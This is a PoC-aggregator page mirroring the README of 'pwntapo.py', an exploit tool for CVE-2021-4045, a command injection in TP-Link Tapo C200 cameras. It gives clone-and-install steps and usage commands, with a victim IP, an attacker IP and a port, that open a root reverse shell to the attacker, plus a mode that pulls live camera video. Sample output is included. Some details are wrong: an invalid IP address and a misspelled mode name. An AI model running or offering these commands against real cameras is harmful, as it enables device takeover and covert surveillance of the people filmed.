POC详情: 6f64748cd9cd59609afd6320c32c56e511288eab

来源
https://github.com/0xbinder/CVE-2021-4045
关联漏洞
标题: Tp-link Tapo C200 命令注入漏洞 (CVE-2021-4045)
描述:Tp-link Tapo C200是中国普联(Tp-link)公司的一款网络摄像头设备。 Tp-link Tapo C200 网络摄像头 1.1.15及其之前的固件版本存在安全漏洞,该漏洞源于软件中存在默认以root身份运行的uhttpd二进制文件,该文件缺少对于命令参数的过滤和转义。未经身份验证的攻击者可以通过特殊的命令请求利用该漏洞在系统上执行系统命令。
描述
🔐 "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" 🔓
介绍
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)

🔐 "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" 🔓

Read about the exploit from [exploit db](https://www.exploit-db.com/exploits/51017)

This is a command injection vulnerability that affect all  TP-Link Tapo c200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works read this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce)

## Installation
```
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)
```

The exploit has two modes SHELL and RSTP. 

## SHELL
In the shell mode you need to provide the victim ip, attacker ip and the listening port only and this will spawn a root shell in the device. 
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887
```
## RSTP
In the RSTP mode you'll need to provide the RSTP_USER, PASSWORD AND CIPHERTEXT to be able to get a live footage from the camera
```shell
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION
文件快照

 [4.0K]  /data/pocs/6f64748cd9cd59609afd6320c32c56e511288eab
├── [4.2K]  pwntapo.py
├── [4.2K]  README.md
└── [  48]  requirements.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。